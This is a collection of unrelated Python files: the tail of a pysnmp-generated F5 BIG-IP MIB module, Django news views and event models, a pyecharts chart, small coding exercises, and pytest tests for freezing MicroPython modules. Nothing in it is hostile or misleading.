bigipAgentNotifyGroup.setStatus('current') bigipSystemNotifyGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2, 4, 3)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipCpuTempHigh"), ("F5-BIGIP-COMMON-MIB", "bigipCpuFanSpeedLow"), ("F5-BIGIP-COMMON-MIB", "bigipCpuFanSpeedBad"), ("F5-BIGIP-COMMON-MIB", "bigipChassisTempHigh"), ("F5-BIGIP-COMMON-MIB", "bigipChassisFanBad"), ("F5-BIGIP-COMMON-MIB", "bigipChassisPowerSupplyBad"), ("F5-BIGIP-COMMON-MIB", "bigipServiceDown"), ("F5-BIGIP-COMMON-MIB", "bigipServiceUp"), ("F5-BIGIP-COMMON-MIB", "bigipNodeDown"), ("F5-BIGIP-COMMON-MIB", "bigipNodeUp"), ("F5-BIGIP-COMMON-MIB", "bigipStandby"), ("F5-BIGIP-COMMON-MIB", "bigipActive"), ("F5-BIGIP-COMMON-MIB", "bigipActiveActive"), ("F5-BIGIP-COMMON-MIB", "bigipFeatureFailed"), ("F5-BIGIP-COMMON-MIB", "bigipFeatureOnline"), ("F5-BIGIP-COMMON-MIB", "bigipLicenseFailed"), ("F5-BIGIP-COMMON-MIB", "bigipLicenseExpired"), ("F5-BIGIP-COMMON-MIB", "bigipTamdAlert"), ("F5-BIGIP-COMMON-MIB", "bigipAggrReaperStateChange"), ("F5-BIGIP-COMMON-MIB", "bigipARPConflict"), ("F5-BIGIP-COMMON-MIB", "bigipNetLinkDown"), ("F5-BIGIP-COMMON-MIB", "bigipDiskPartitionWarn"), ("F5-BIGIP-COMMON-MIB", "bigipDiskPartitionGrowth"), ("F5-BIGIP-COMMON-MIB", "bigipAuthFailed"), ("F5-BIGIP-COMMON-MIB", "bigipConfigLoaded"), ("F5-BIGIP-COMMON-MIB", "bigipLogEmerg"), ("F5-BIGIP-COMMON-MIB", "bigipLogAlert"), ("F5-BIGIP-COMMON-MIB", "bigipLogCrit"), ("F5-BIGIP-COMMON-MIB", "bigipLogErr"), ("F5-BIGIP-COMMON-MIB", "bigipLogWarning"), ("F5-BIGIP-COMMON-MIB", "bigipPacketRejected"), ("F5-BIGIP-COMMON-MIB", "bigipCompLimitExceeded"), ("F5-BIGIP-COMMON-MIB", "bigipSslLimitExceeded"), ("F5-BIGIP-COMMON-MIB", "bigipExternalLinkChange"), ("F5-BIGIP-COMMON-MIB", "bigipAsmRequestBlocked"), ("F5-BIGIP-COMMON-MIB", "bigipAsmRequestViolation"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLinkAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLinkNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLinkDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLinkEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmWideIpAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmWideIpNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmWideIpDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmWideIpEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolMbrAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolMbrNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolMbrDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolMbrEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmServerAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmServerNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmServerDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmServerEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmVsAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmVsNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmVsDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmVsEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmDcAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmDcNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmDcDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmDcEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipHardDiskFailure"), ("F5-BIGIP-COMMON-MIB", "bigipGtmAppObjAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmAppObjNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmAppAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmAppNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmJoinedGroup"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLeftGroup"), ("F5-BIGIP-COMMON-MIB", "bigipStandByFail"), ("F5-BIGIP-COMMON-MIB", "bigipInetPortExhaustion"), ("F5-BIGIP-COMMON-MIB", "bigipGtmBoxAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmBoxNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipAsmFtpRequestBlocked"), ("F5-BIGIP-COMMON-MIB", "bigipAsmFtpRequestViolation"), ("F5-BIGIP-COMMON-MIB", "bigipGtmBig3dSslCertExpired"), ("F5-BIGIP-COMMON-MIB", "bigipGtmBig3dSslCertWillExpire"), ("F5-BIGIP-COMMON-MIB", "bigipGtmSslCertExpired"), ("F5-BIGIP-COMMON-MIB", "bigipGtmSslCertWillExpire"), ("F5-BIGIP-COMMON-MIB", "bigipAsmSmtpRequestBlocked"), ("F5-BIGIP-COMMON-MIB", "bigipAsmSmtpRequestViolation"), ("F5-BIGIP-COMMON-MIB", "bigipBladeTempHigh"), ("F5-BIGIP-COMMON-MIB", "bigipBladeNoPower"), ("F5-BIGIP-COMMON-MIB", "bigipClusterdNoResponse"), ("F5-BIGIP-COMMON-MIB", "bigipBladeOffline"), ("F5-BIGIP-COMMON-MIB", "bigipAsmDosAttackDetected"), ("F5-BIGIP-COMMON-MIB", "bigipAsmBruteForceAttackDetected"), ("F5-BIGIP-COMMON-MIB", "bigipAomCpuTempTooHigh"), ("F5-BIGIP-COMMON-MIB", "bigipGtmKeyGenerationRollover"), ("F5-BIGIP-COMMON-MIB", "bigipGtmKeyGenerationExpiration"), ("F5-BIGIP-COMMON-MIB", "bigipRaidDiskFailure"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolStatusChange"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolStatusChangeReason"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolMbrStatusChange"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolMbrStatusChangeReason"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolMbrDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmProberPoolMbrEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipAvrAlertsMetricSnmp"), ("F5-BIGIP-COMMON-MIB", "bigipAvrAlertsMetricSmtp"), ("F5-BIGIP-COMMON-MIB", "bigipVcmpAlertsVcmpPowerOn"), ("F5-BIGIP-COMMON-MIB", "bigipVcmpAlertsVcmpPowerOff"), ("F5-BIGIP-COMMON-MIB", "bigipVcmpAlertsVcmpHBLost"), ("F5-BIGIP-COMMON-MIB", "bigipVcmpAlertsVcmpHBDetected"), ("F5-BIGIP-COMMON-MIB", "bigipSsdMwiNearThreshold"), ("F5-BIGIP-COMMON-MIB", "bigipSsdMwiReachedThreshold"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertTempHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertVoltageHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertFanSpeedLow"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalSsdPhysicalDiskRemoved"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalSsdLogicalDiskRemoved"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalDiskBayRemoved"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalBladePoweredOff"), ("F5-BIGIP-COMMON-MIB", "bigipLibhalSensorAlarmCritical"), ("F5-BIGIP-COMMON-MIB", "bigipChmandAlertFanTrayBad"), ("F5-BIGIP-COMMON-MIB", "bigipUnsolicitedRepliesExceededThreshold"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertVoltageLow"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertMilliVoltageHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertCurrentHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertPowerHigh"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertMilliVoltageLow"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertCurrentLow"), ("F5-BIGIP-COMMON-MIB", "bigipSystemCheckAlertPowerLow"), ("F5-BIGIP-COMMON-MIB", "bigipNodeRate"), ("F5-BIGIP-COMMON-MIB", "bigipMemberRate"), ("F5-BIGIP-COMMON-MIB", "bigipVirtualRate"), ("F5-BIGIP-COMMON-MIB", "bigipDosAttackStart"), ("F5-BIGIP-COMMON-MIB", "bigipDosAttackStop"), ("F5-BIGIP-COMMON-MIB", "bigipLtmVsAvail"), ("F5-BIGIP-COMMON-MIB", "bigipLtmVsUnavail"), ("F5-BIGIP-COMMON-MIB", "bigipLtmVsEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipLtmVsDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipDnsRequestRateLimiterEngaged"), ("F5-BIGIP-COMMON-MIB", "bigipGtmRequestRateLimiterEngaged"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupStandby"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupActive"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupOffline"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupForcedOffline"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupDeactivate"), ("F5-BIGIP-COMMON-MIB", "bigipTrafficGroupActivate"), ("F5-BIGIP-COMMON-MIB", "bigipPsPowerOn"), ("F5-BIGIP-COMMON-MIB", "bigipPsPowerOff"), ("F5-BIGIP-COMMON-MIB", "bigipPsAbsent"), ("F5-BIGIP-COMMON-MIB", "bigipClusterPrimaryChanged"), ("F5-BIGIP-COMMON-MIB", "bigipSystemShutdown"), ("F5-BIGIP-COMMON-MIB", "bigipFipsDeviceError"), ("F5-BIGIP-COMMON-MIB", "bigipUpdatePriority"), ("F5-BIGIP-COMMON-MIB", "bigipUpdateServer"), ("F5-BIGIP-COMMON-MIB", "bigipUpdateError"), ("F5-BIGIP-COMMON-MIB", "bigipFipsFault")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): bigipSystemNotifyGroup = bigipSystemNotifyGroup.setStatus('current') class LongDisplayString(TextualConvention, OctetString): status = 'current' displayHint = '1024a' subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(0, 1024) mibBuilder.exportSymbols("F5-BIGIP-COMMON-MIB", bigipCpuFanSpeedBad=bigipCpuFanSpeedBad, bigipTrafficGroupForcedOffline=bigipTrafficGroupForcedOffline, bigipAsmSmtpRequestViolation=bigipAsmSmtpRequestViolation, bigipStandby=bigipStandby, bigipGtmServerAvail=bigipGtmServerAvail, bigipNotifyObjMsg=bigipNotifyObjMsg, bigipLicenseFailed=bigipLicenseFailed, bigipSystemCheckAlertPowerLow=bigipSystemCheckAlertPowerLow, bigipLtmVsEnabled=bigipLtmVsEnabled, bigipGtmVsDisabled=bigipGtmVsDisabled, bigipSystemCheckAlertCurrentHigh=bigipSystemCheckAlertCurrentHigh, bigipCpuTempHigh=bigipCpuTempHigh, bigipCompLimitExceeded=bigipCompLimitExceeded, bigipGtmVsNotAvail=bigipGtmVsNotAvail, bigipGtmBoxAvail=bigipGtmBoxAvail, bigipGtmDcEnabled=bigipGtmDcEnabled, bigipGtmJoinedGroup=bigipGtmJoinedGroup, bigipGtmPoolMbrNotAvail=bigipGtmPoolMbrNotAvail, bigipAggrReaperStateChange=bigipAggrReaperStateChange, bigipLogCrit=bigipLogCrit, bigipChmandAlertFanTrayBad=bigipChmandAlertFanTrayBad, bigipLogErr=bigipLogErr, bigipTrafficMgmt=bigipTrafficMgmt, bigipGtmProberPoolEnabled=bigipGtmProberPoolEnabled, bigipGtmAppObjAvail=bigipGtmAppObjAvail, bigipLtmVsDisabled=bigipLtmVsDisabled, bigipChassisFanBad=bigipChassisFanBad, bigipVirtualRate=bigipVirtualRate, bigipDiskPartitionGrowth=bigipDiskPartitionGrowth, bigipDosAttackStart=bigipDosAttackStart, bigipInetPortExhaustion=bigipInetPortExhaustion, f5=f5, bigipAomCpuTempTooHigh=bigipAomCpuTempTooHigh, bigipVcmpAlertsVcmpHBDetected=bigipVcmpAlertsVcmpHBDetected, bigipSystemNotifyGroup=bigipSystemNotifyGroup, bigipChassisPowerSupplyBad=bigipChassisPowerSupplyBad, bigipActiveActive=bigipActiveActive, bigipGtmPoolEnabled=bigipGtmPoolEnabled, bigipUpdatePriority=bigipUpdatePriority, bigipGtmProberPoolMbrEnabled=bigipGtmProberPoolMbrEnabled, bigipGtmKeyGenerationExpiration=bigipGtmKeyGenerationExpiration, bigipGtmProberPoolMbrDisabled=bigipGtmProberPoolMbrDisabled, bigipNodeUp=bigipNodeUp, bigipAsmBruteForceAttackDetected=bigipAsmBruteForceAttackDetected, bigipGtmLinkNotAvail=bigipGtmLinkNotAvail, bigipSsdMwiNearThreshold=bigipSsdMwiNearThreshold, bigipGtmPoolMbrAvail=bigipGtmPoolMbrAvail, bigipGtmKeyGenerationRollover=bigipGtmKeyGenerationRollover, bigipVcmpAlertsVcmpHBLost=bigipVcmpAlertsVcmpHBLost, bigipMemberRate=bigipMemberRate, bigipDiskPartitionWarn=bigipDiskPartitionWarn, bigipGtmVsAvail=bigipGtmVsAvail, bigipUpdateServer=bigipUpdateServer, bigipCompliances=bigipCompliances, bigipClusterdNoResponse=bigipClusterdNoResponse, bigipGtmPoolDisabled=bigipGtmPoolDisabled, bigipRaidDiskFailure=bigipRaidDiskFailure, bigipSystemCheckAlertPowerHigh=bigipSystemCheckAlertPowerHigh, bigipPsPowerOn=bigipPsPowerOn, bigipLibhalSsdLogicalDiskRemoved=bigipLibhalSsdLogicalDiskRemoved, PYSNMP_MODULE_ID=f5, bigipNotifyObjPort=bigipNotifyObjPort, bigipFeatureFailed=bigipFeatureFailed, bigipNotifyObjNode=bigipNotifyObjNode, bigipLtmVsAvail=bigipLtmVsAvail, bigipAsmRequestViolation=bigipAsmRequestViolation, bigipPsAbsent=bigipPsAbsent, bigipFipsDeviceError=bigipFipsDeviceError, bigipAsmDosAttackDetected=bigipAsmDosAttackDetected, bigipLogEmerg=bigipLogEmerg, bigipLibhalDiskBayRemoved=bigipLibhalDiskBayRemoved, bigipGtmRequestRateLimiterEngaged=bigipGtmRequestRateLimiterEngaged, bigipLibhalBladePoweredOff=bigipLibhalBladePoweredOff, bigipFeatureOnline=bigipFeatureOnline, bigipClusterPrimaryChanged=bigipClusterPrimaryChanged, bigipSystemCheckAlertTempHigh=bigipSystemCheckAlertTempHigh, bigipGtmWideIpAvail=bigipGtmWideIpAvail, bigipGtmAppObjNotAvail=bigipGtmAppObjNotAvail, bigipGtmPoolMbrDisabled=bigipGtmPoolMbrDisabled, bigipGroups=bigipGroups, bigipBladeOffline=bigipBladeOffline, bigipTrafficGroupStandby=bigipTrafficGroupStandby, bigipAgentShutdown=bigipAgentShutdown, bigipChassisTempHigh=bigipChassisTempHigh, bigipAsmSmtpRequestBlocked=bigipAsmSmtpRequestBlocked, bigipGtmVsEnabled=bigipGtmVsEnabled, LongDisplayString=LongDisplayString, bigipGtmAppAvail=bigipGtmAppAvail, bigipGtmLinkDisabled=bigipGtmLinkDisabled, bigipSystemCheckAlertMilliVoltageLow=bigipSystemCheckAlertMilliVoltageLow, bigipLogAlert=bigipLogAlert, bigipServiceDown=bigipServiceDown, bigipGtmSslCertWillExpire=bigipGtmSslCertWillExpire, bigipGtmProberPoolStatusChangeReason=bigipGtmProberPoolStatusChangeReason, bigipTrafficGroupOffline=bigipTrafficGroupOffline, bigipSystemCheckAlertVoltageLow=bigipSystemCheckAlertVoltageLow, bigipNodeDown=bigipNodeDown, bigipFipsFault=bigipFipsFault, bigipLogWarning=bigipLogWarning, bigipBladeTempHigh=bigipBladeTempHigh, bigipGtmPoolNotAvail=bigipGtmPoolNotAvail, bigipGtmProberPoolMbrStatusChangeReason=bigipGtmProberPoolMbrStatusChangeReason, bigipGtmServerEnabled=bigipGtmServerEnabled, bigipUnsolicitedRepliesExceededThreshold=bigipUnsolicitedRepliesExceededThreshold, bigipAsmRequestBlocked=bigipAsmRequestBlocked, bigipAgentRestart=bigipAgentRestart, bigipActive=bigipActive, bigipSystemCheckAlertVoltageHigh=bigipSystemCheckAlertVoltageHigh, bigipHardDiskFailure=bigipHardDiskFailure, bigipCpuFanSpeedLow=bigipCpuFanSpeedLow, bigipBladeNoPower=bigipBladeNoPower, bigipNotificationGroups=bigipNotificationGroups, bigipGtmProberPoolDisabled=bigipGtmProberPoolDisabled, bigipExternalLinkChange=bigipExternalLinkChange, bigipGtmSslCertExpired=bigipGtmSslCertExpired, bigipNotifyObjectsGroup=bigipNotifyObjectsGroup, bigipNodeRate=bigipNodeRate, bigipGtmDcDisabled=bigipGtmDcDisabled, bigipAuthFailed=bigipAuthFailed, bigipTrafficGroupActivate=bigipTrafficGroupActivate, bigipTamdAlert=bigipTamdAlert, bigipLibhalSsdPhysicalDiskRemoved=bigipLibhalSsdPhysicalDiskRemoved, bigipGtmPoolMbrEnabled=bigipGtmPoolMbrEnabled, bigipGtmAppNotAvail=bigipGtmAppNotAvail, bigipUpdateError=bigipUpdateError, bigipGtmWideIpNotAvail=bigipGtmWideIpNotAvail, bigipPacketRejected=bigipPacketRejected, bigipNotificationCompliance=bigipNotificationCompliance, bigipGtmWideIpDisabled=bigipGtmWideIpDisabled, bigipSsdMwiReachedThreshold=bigipSsdMwiReachedThreshold, bigipSystemShutdown=bigipSystemShutdown, bigipGtmWideIpEnabled=bigipGtmWideIpEnabled, bigipLicenseExpired=bigipLicenseExpired, bigipSystemCheckAlertMilliVoltageHigh=bigipSystemCheckAlertMilliVoltageHigh, bigipARPConflict=bigipARPConflict, bigipTrafficGroupDeactivate=bigipTrafficGroupDeactivate, bigipStandByFail=bigipStandByFail, bigipNotifyObjects=bigipNotifyObjects, bigipSystemCheckAlertCurrentLow=bigipSystemCheckAlertCurrentLow, bigipVcmpAlertsVcmpPowerOff=bigipVcmpAlertsVcmpPowerOff, bigipServiceUp=bigipServiceUp, bigipAsmFtpRequestBlocked=bigipAsmFtpRequestBlocked, bigipAsmFtpRequestViolation=bigipAsmFtpRequestViolation, bigipNotification=bigipNotification, bigipNetLinkDown=bigipNetLinkDown, bigipTrafficGroupActive=bigipTrafficGroupActive, bigipGtmLinkAvail=bigipGtmLinkAvail, bigipGtmDcAvail=bigipGtmDcAvail, bigipCompliance=bigipCompliance, bigipGtmLeftGroup=bigipGtmLeftGroup, bigipAvrAlertsMetricSmtp=bigipAvrAlertsMetricSmtp, bigipPsPowerOff=bigipPsPowerOff, bigipGtmPoolAvail=bigipGtmPoolAvail, bigipAvrAlertsMetricSnmp=bigipAvrAlertsMetricSnmp, bigipSslLimitExceeded=bigipSslLimitExceeded, bigipAgentStart=bigipAgentStart, bigipDosAttackStop=bigipDosAttackStop, bigipGtmBoxNotAvail=bigipGtmBoxNotAvail, bigipGtmBig3dSslCertExpired=bigipGtmBig3dSslCertExpired, bigipVcmpAlertsVcmpPowerOn=bigipVcmpAlertsVcmpPowerOn, bigipGtmProberPoolMbrStatusChange=bigipGtmProberPoolMbrStatusChange, bigipLtmVsUnavail=bigipLtmVsUnavail, bigipGtmProberPoolStatusChange=bigipGtmProberPoolStatusChange, bigipGtmServerDisabled=bigipGtmServerDisabled, bigipGtmBig3dSslCertWillExpire=bigipGtmBig3dSslCertWillExpire, bigipConfigLoaded=bigipConfigLoaded, bigipLibhalSensorAlarmCritical=bigipLibhalSensorAlarmCritical, bigipDnsRequestRateLimiterEngaged=bigipDnsRequestRateLimiterEngaged, bigipGtmServerNotAvail=bigipGtmServerNotAvail, bigipNotifications=bigipNotifications, bigipAgentNotifyGroup=bigipAgentNotifyGroup, bigipGtmLinkEnabled=bigipGtmLinkEnabled, bigipGtmDcNotAvail=bigipGtmDcNotAvail, bigipSystemCheckAlertFanSpeedLow=bigipSystemCheckAlertFanSpeedLow)
nilq/baby-python
python
# Copyright (c) ZJUTCV. All rights reserved. def points2xyxy(points): """ Args: points (list): Returns: """ x_list = [points[i] for i in range(0, 8, 2)] y_list = [points[i] for i in range(1, 8, 2)] x_min = min(x_list) x_max = max(x_list) y_min = min(y_list) y_max = max(y_list) return [x_min, y_min, x_max, y_max]
nilq/baby-python
python
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.conf import settings from django.shortcuts import get_object_or_404 from django.utils import six from django.views.generic import ArchiveIndexView, DateDetailView from glitter.mixins import GlitterDetailMixin from .models import Category, Post class BasePostListView(ArchiveIndexView): allow_empty = True date_field = 'date' paginate_by = getattr(settings, 'NEWS_PER_PAGE', 10) template_name_suffix = '_list' context_object_name = 'object_list' ordering = ('-is_sticky', '-date', '-id') def get_queryset(self): queryset = Post.objects.published() ordering = self.get_ordering() if ordering: if isinstance(ordering, six.string_types): ordering = (ordering,) queryset = queryset.order_by(*ordering) return queryset def get_context_data(self, **kwargs): context = super(BasePostListView, self).get_context_data(**kwargs) context['categories'] = Category.objects.all() context['news_categories'] = True return context class PostListView(BasePostListView): def get_ordering(self): if getattr(settings, 'NEWS_STICKY_ON_ALL', True): return super().get_ordering() else: return ('-date', '-id') class PostListCategoryView(BasePostListView): template_name_suffix = '_category_list' def get_queryset(self): qs = super(PostListCategoryView, self).get_queryset() self.category = get_object_or_404(Category, slug=self.kwargs['slug']) return qs.filter(category=self.category) def get_context_data(self, **kwargs): context = super(PostListCategoryView, self).get_context_data(**kwargs) context['current_category'] = self.category return context class PostDetailView(GlitterDetailMixin, DateDetailView): queryset = Post.objects.select_related().filter(published=True) month_format = '%m' date_field = 'date' def get_allow_future(self): """ Only superusers and users with the permission can edit the post. """ qs = self.get_queryset() post_edit_permission = '{}.edit_{}'.format( qs.model._meta.app_label, qs.model._meta.model_name ) if self.request.user.has_perm(post_edit_permission): return True return False def get_context_data(self, **kwargs): context = super(PostDetailView, self).get_context_data(**kwargs) context['categories'] = Category.objects.all() # Add this to display 'All news' on categories list. context['news_categories'] = True context['current_category'] = self.object.category return context class PostListTagView(PostListView): template_name_suffix = '_tag_list' def get_queryset(self): qs = super(PostListTagView, self).get_queryset() self.tag = get_object_or_404(Post.tags.all(), slug=self.kwargs['slug']) return qs.filter(tags=self.tag) def get_context_data(self, **kwargs): context = super(PostListTagView, self).get_context_data(**kwargs) context['current_tag'] = self.tag return context
nilq/baby-python
python
import random from pyecharts import options as opts from pyecharts.charts import Polar c = ( Polar() .add("", [(10, random.randint(1, 100)) for i in range(300)], type_="scatter") .add("", [(11, random.randint(1, 100)) for i in range(300)], type_="scatter") .set_series_opts(label_opts=opts.LabelOpts(is_show=False)) .set_global_opts(title_opts=opts.TitleOpts(title="Polar-Scatter1")) .render("polar_scatter_1.html") )
nilq/baby-python
python
from django.db import models from django.contrib.auth.models import User from django.conf import settings from django.utils.timezone import now from django.utils import timezone # from froala_editor.fields import FroalaField from django.contrib.auth import get_user_model # Create your models here. # from .models import OrganiseEvent class OrganiseEvent(models.Model): event_title = models.CharField(max_length=200) event_description = models.CharField(max_length=800) event_category = models.CharField(max_length=200) org_name = models.CharField(max_length=200) org_email = models.EmailField(max_length=100) org_mobile = models.BigIntegerField() org_contact_person = models.CharField(max_length=100) event_poster = models.ImageField( upload_to='images/event_poster/', default="images/noimage.png") event_startdate = models.DateTimeField(default=now) event_enddate = models.DateTimeField() us = models.ForeignKey(User, on_delete=models.CASCADE) def summary(self): return self.event_description[:150] class EventDetails(models.Model): event = models.CharField(max_length=200) expected_participant = models.IntegerField() no_participant = models.IntegerField() event_level = models.CharField(max_length=200) eligibility = models.CharField(max_length=200) prerequisite = models.TextField(max_length=1500) facility = models.CharField(max_length=100) event_detail_docs = models.FileField( upload_to='images/event_details_docs/') us = models.ForeignKey(User, on_delete=models.CASCADE) org_id = models.ForeignKey(OrganiseEvent, on_delete=models.CASCADE) class ShareResource(models.Model): event_title = models.CharField(max_length=100) subject = models.CharField(max_length=100) description = models.TextField(max_length=1500) publishedDate = models.DateTimeField(default=now) resourceLink = models.CharField(max_length=100) documentFile = models.FileField(upload_to='images/shared_resources_docs/') publisedBy = models.CharField(max_length=100) resourceImage = models.ImageField(upload_to='images/shared_resources/') us = models.ForeignKey(User, on_delete=models.CASCADE) org_id = models.ForeignKey(OrganiseEvent, on_delete=models.CASCADE) class SponsorShip(models.Model): event_title = models.CharField(max_length=100, default=True) platinum_sponsor = models.CharField(max_length=100) f_platinum = models.TextField(max_length=1500) ex_platinum = models.IntegerField() gold_sponsor = models.CharField(max_length=100) f_gold = models.TextField(max_length=1500) ex_gold = models.IntegerField() silver_sponsor = models.CharField(max_length=100) f_silver = models.TextField(max_length=1500) ex_silver = models.IntegerField() us = models.ForeignKey(User, on_delete=models.CASCADE) org_id = models.ForeignKey(OrganiseEvent, on_delete=models.CASCADE) class Event_Location(models.Model): event_venue_name = models.CharField(max_length=200) event_venue_addr = models.CharField(max_length=300) event_latitude = models.CharField(max_length=100) event_longitude = models.CharField(max_length=100) eventid = models.ForeignKey(OrganiseEvent, on_delete=models.CASCADE) event_name = models.CharField(max_length=200)
nilq/baby-python
python
def gcd(a, b): if a % b == 0: return b else: return gcd(b, a % b) def main(): A = B = 1 for a in xrange(10, 100): for b in xrange(a + 1, 100): x = a % 10 y = b / 10 if x != y: continue x = a / 10 y = b % 10 if y == 0: continue if x / gcd(x, y) == a / gcd(a, b) and \ y / gcd(x, y) == b / gcd(a, b): #print A, B A *= a B *= b print B / gcd(A, B) main()
nilq/baby-python
python
""" Vowel to Vowel Links Given a sentence as txt, return True if any two adjacent words have this property: One word ends with a vowel, while the word immediately after begins with a vowel (a e i o u). Examples vowel_links("a very large appliance") ➞ True vowel_links("go to edabit") ➞ True vowel_links("an open fire") ➞ False vowel_links("a sudden applause") ➞ False Notes You can expect sentences in only lowercase. """ def vowel_links(txt): a, v = list(txt.split(" ")), "aeiou" for i in range(len(a)-1) : if (a[i][-1] in v) and ((a[i+1])[0] in v): return True return False vowel_links("a very large appliance") #➞ True #vowel_links("go to edabit") #➞ True #vowel_links("an open fire") #➞ False #vowel_links("a sudden applause") #➞False
nilq/baby-python
python
import pytest from pathlib import Path # pylint: disable=wrong-import-position,import-error import basicgit as git # Module Under Test import get_mpy # No Mocks, does actual extraction from repro # TODO: allow tests to work on any path, not just my own machine @pytest.mark.parametrize( "path, port, board", [ ('C:\\develop\\MyPython\\TESTREPO-micropython\\ports\\esp32\\modules\\_boot.py', 'esp32', None), ('/develop/MyPython/TESTREPO-micropython/ports/esp32/modules/_boot.py', 'esp32', None), ('../TESTREPO-micropython/ports/esp32/modules/_boot.py', 'esp32', None), ('C:\\develop\\MyPython\\TESTREPO-micropython\\ports\\stm32\\boards\\PYBV11\\modules\\_boot.py', 'stm32', 'PYBV11'), ('/develop/MyPython/TESTREPO-micropython/ports/stm32/boards/PYBV11/modules/_boot.py', 'stm32', 'PYBV11'), ('../TESTREPO-micropython/ports/stm32/boards/PYBV11/modules/_boot.py', 'stm32', 'PYBV11'), ] ) def test_extract_target_names(path, port, board): _port, _board = get_mpy.get_target_names(path) assert _board == board assert _port == port def test_freezer_mpy_manifest(tmp_path, testrepo_micropython, testrepo_micropython_lib): "test if we can freeze source using manifest.py files" # mpy_path = Path(testrepo_micropython) # mpy_lib = Path(testrepo_micropython_lib) mpy_path = testrepo_micropython mpy_lib = testrepo_micropython_lib # mpy version must be at 1.12 or newer mpy_version = 'v1.12' version = git.get_tag(mpy_path) if version < mpy_version: git.checkout_tag(mpy_version, mpy_path) version = git.get_tag(mpy_path) assert version == mpy_version, "prep: could not checkout version {} of {}".format(mpy_version, mpy_path) stub_path = Path(tmp_path) get_mpy.get_frozen(str(stub_path), version= mpy_version, mpy_path= mpy_path, lib_path=mpy_lib) scripts = list(stub_path.rglob('*.py')) assert scripts is not None, "can freeze scripts from manifest" assert len(scripts) > 10, "expect at least 50 files, only found {}".format(len(scripts)) def test_freezer_mpy_folders(tmp_path, testrepo_micropython): "test if we can freeze source using modules folders" mpy_path = testrepo_micropython # mpy version must be older than 1.12 ( so use 1.10) mpy_version = 'v1.10' version = git.get_tag(mpy_path) if version != mpy_version: git.checkout_tag(mpy_version, mpy_path) version = git.get_tag(mpy_path) assert version == mpy_version, "prep: could not checkout version {} of ../micropython".format(mpy_version) stub_path = tmp_path # freezer_mpy.get_frozen(stub_path, mpy_path, lib_path='../micropython-lib') get_mpy.get_frozen_folders(stub_path, mpy_path, lib_path='../micropython-lib', version = mpy_version) assert True
nilq/baby-python
python
